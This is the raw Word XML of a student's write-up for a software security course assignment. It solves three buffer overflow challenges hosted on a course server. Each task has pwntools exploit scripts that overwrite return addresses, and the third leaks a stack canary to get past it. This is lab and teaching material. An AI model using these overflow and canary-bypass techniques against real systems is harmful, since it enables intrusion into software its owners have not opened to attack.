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4F4B" w14:textId="3D7A83F2" w:rsidR="00AF3484" w:rsidRPr="002D125F" w:rsidRDefault="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D125F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INF226 – Mandatory 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024A2D9" w14:textId="08B110DD" w:rsidR="002D125F" w:rsidRPr="002D125F" w:rsidRDefault="002D125F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D125F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Made by Kasper Melheim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490604CC" w14:textId="1E5E477E" w:rsidR="00DE2C59" w:rsidRPr="002D125F" w:rsidRDefault="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D125F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A79A8" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:r>
        <w:t>On this task I basically followed the simple buffer overflow examples found in the lectures. Solved it using VSCode on a unix system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D58DF1" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:r>
        <w:t>The uncontrolled user input is what causes a vulnerability in the program. At the moment a buffer overflow attack is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E61748D" w14:textId="01DAC9CD" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:r>
        <w:t>I created a connection to the program. I then tried step by step by sending different data to the program, sometimes it returned "Stack smashing detected".</w:t>
      </w:r>
      <w:r w:rsidR="002D125F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>So I had to find a way to bypass this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC10403" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:r>
        <w:t>I first found out the position in memory that we are interested in. I used flat() from pwn for this. I then sent in 16 bytes to fill the length of the "allowed" bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3C92B" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The position in bytes was then added to the end of the 16 bytes already filled. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>The flag was returned when sent to the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00096DFC" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CD1D97" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="002D125F" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D125F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4D072" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ED7B74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#imports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5D0D4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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52493DFD" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDBFF2E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#host and port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D9739C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 xml:space="preserve">conn = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>'ctf21.softwaresecurity.no', 7000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934F0BB" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F03ED3B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 xml:space="preserve">#receive data </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>from program</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64B0CC38" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>conn.recvline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D976DBD" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6559CCFD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#overflow the 16 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A0450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bufferoverflow = b'X'*16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E245B50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#target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFD544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target = flat(0x79beef8b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07357D4E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print(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A14C685" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A10A418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#data we will send to the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B742D5E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">data = bufferoverflow + target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD6AB4" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF36976" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>#send data and flag will be returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21A730" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>conn.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2C59">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6517B5AD" w14:textId="5D5F7266" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59" w:rsidP="00DE2C59">
      <w:r>
        <w:t>conn.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B488C6" w14:textId="75EFE5F9" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00DE2C59"/>
    <w:p w14:paraId="75139A7B" w14:textId="671312C1" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A68AF" w14:textId="28705071" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>The vulnerability with the program is that we as the user can search the binary file for the position of a getFlag function</w:t>
      </w:r>
      <w:r w:rsidR="00FA2F26">
        <w:t>, aswell as buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C27729" w14:textId="15D11056" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>This function can be used to return the data we are looking for. Again, we also perform buffer overflow, which is also a failure in the security system of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF134BA" w14:textId="008CB7E2" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>To find the flag I first had to find out the placement of the getFlag function (found in the sourcecode of the program).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I used "objdump -d 01b | grep getFlag" for this. This returns "00000000004011f6 &lt;getFlag&gt;". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1AFB4" w14:textId="4E9FA53A" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>01b is the binary file of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E694D" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>Found out we need to use 0x4011f6 as the address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D855B7" w14:textId="04DBACBD" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>I then use much of the same code from task 1, where I run bufferoverflow on the 16 bits, and add the address of the function at the end of that.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>The flag is then returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D2B10" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F49FFFF" w14:textId="6C0F9310" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EEA4C9" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446"/>
    <w:p w14:paraId="0234BA58" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>#imports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD773E" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3464FC" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446"/>
    <w:p w14:paraId="0712F1C4" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>#host and port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD193FD" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>conn = remote('ctf21.softwaresecurity.no', 7001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F273C10" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446"/>
    <w:p w14:paraId="6F37DBB2" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>#receive data from program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF42A1C" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>conn.recvline()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E00441F" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446"/>
    <w:p w14:paraId="7B422BD4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t>#overflow the 16 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34986AAA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t>bufferoverflow = b'X'*16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5640BEF8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t>#target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB0750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lastRenderedPageBreak/>
        <w:t>target = p64(0x4011f6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F844C06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t>print(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165525B" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27152E2C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t>#data we will send to the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729921E7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t xml:space="preserve">data = bufferoverflow + target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6910A" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E72771" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>#send data and flag will be returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE0E8CE" w14:textId="77777777" w:rsidR="00BD2446" w:rsidRPr="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>conn.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD2446">
        <w:rPr>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9C102" w14:textId="77CACA6D" w:rsidR="00BD2446" w:rsidRDefault="00BD2446" w:rsidP="00BD2446">
      <w:r>
        <w:t>conn.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C4AD76" w14:textId="493F5711" w:rsidR="00FA2F26" w:rsidRDefault="00FA2F26" w:rsidP="00BD2446"/>
    <w:p w14:paraId="64FDEF7F" w14:textId="539F9234" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00FA2F26" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9D14C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The vulnerability with this program is that we can perform buffer overflow to overwrite the 16 bits, aswell as use a offset and canaryVal to find the position where we want to insert our address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F3B9B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The adress was found the same way as in task 2, by using objdump on the binary file and look for getFlag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE91D5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 xml:space="preserve">The offset we need to use was found by sending in various numbers to the program using gdb and run at a breakpoint on a specific line. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D8122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When we combined the bufferoverflow, offset, canaryVal and the address, and sent it to the program, the flag was returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FA647" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BAE316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Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA68F0C" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CA80D9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#Made my Kasper Melheim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBDD53B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#imports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA0E75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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F93FB2" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290D7B6A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#host and port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05444CA1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conn = remote('ctf21.softwaresecurity.no', 7002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C7C07" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336EF395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#receive data from program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42836934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conn.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667D412" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183F8AC3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lastRenderedPageBreak/>
        <w:t>#offset and canaryVal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB149C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offset = b'16'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12803D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conn.sendline(offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE564A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number = conn.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D11C36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canaryVal = p64(int(number()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3440D3" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA7A622" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>#overflow the 16 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D4B22" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>bufferoverflow = b'X'*(16+8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5816AB" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576A6441" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>#target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2794EC0E" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t>target = p64(0x4007f7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173091C8" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D555E14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#data we will send to the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06F67E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data = bufferoverflow + canaryVal + b'X'*8 + target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192AEF5B" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2D36A6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#send data and flag will be returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249647D0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conn.sendline(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DB14F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conn.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397E6C3" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00A1472E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1472E">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>conn.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1C207" w14:textId="77777777" w:rsidR="00A1472E" w:rsidRPr="00A1472E" w:rsidRDefault="00A1472E" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C4111D" w14:textId="77777777" w:rsidR="00FA2F26" w:rsidRPr="00FA2F26" w:rsidRDefault="00FA2F26" w:rsidP="00BD2446">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E97FDF" w14:textId="15DB5259" w:rsidR="00DE2C59" w:rsidRPr="00DE2C59" w:rsidRDefault="00DE2C59"/>
    <w:p w14:paraId="19F2ECFC" w14:textId="77777777" w:rsidR="00DE2C59" w:rsidRDefault="00DE2C59"/>
    <w:sectPr w:rsidR="00DE2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AD"/>
    <w:rsid w:val="002D125F"/>
    <w:rsid w:val="00936EAD"/>
    <w:rsid w:val="00A1472E"/>
    <w:rsid w:val="00AF3484"/>
    <w:rsid w:val="00BD2446"/>
    <w:rsid w:val="00DE2C59"/>
    <w:rsid w:val="00F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A61D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FFFCBB8A-28C2-4DE9-8D51-B38FB9A5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560</Words>
  <Characters>2968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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-16T16:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-16T16:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>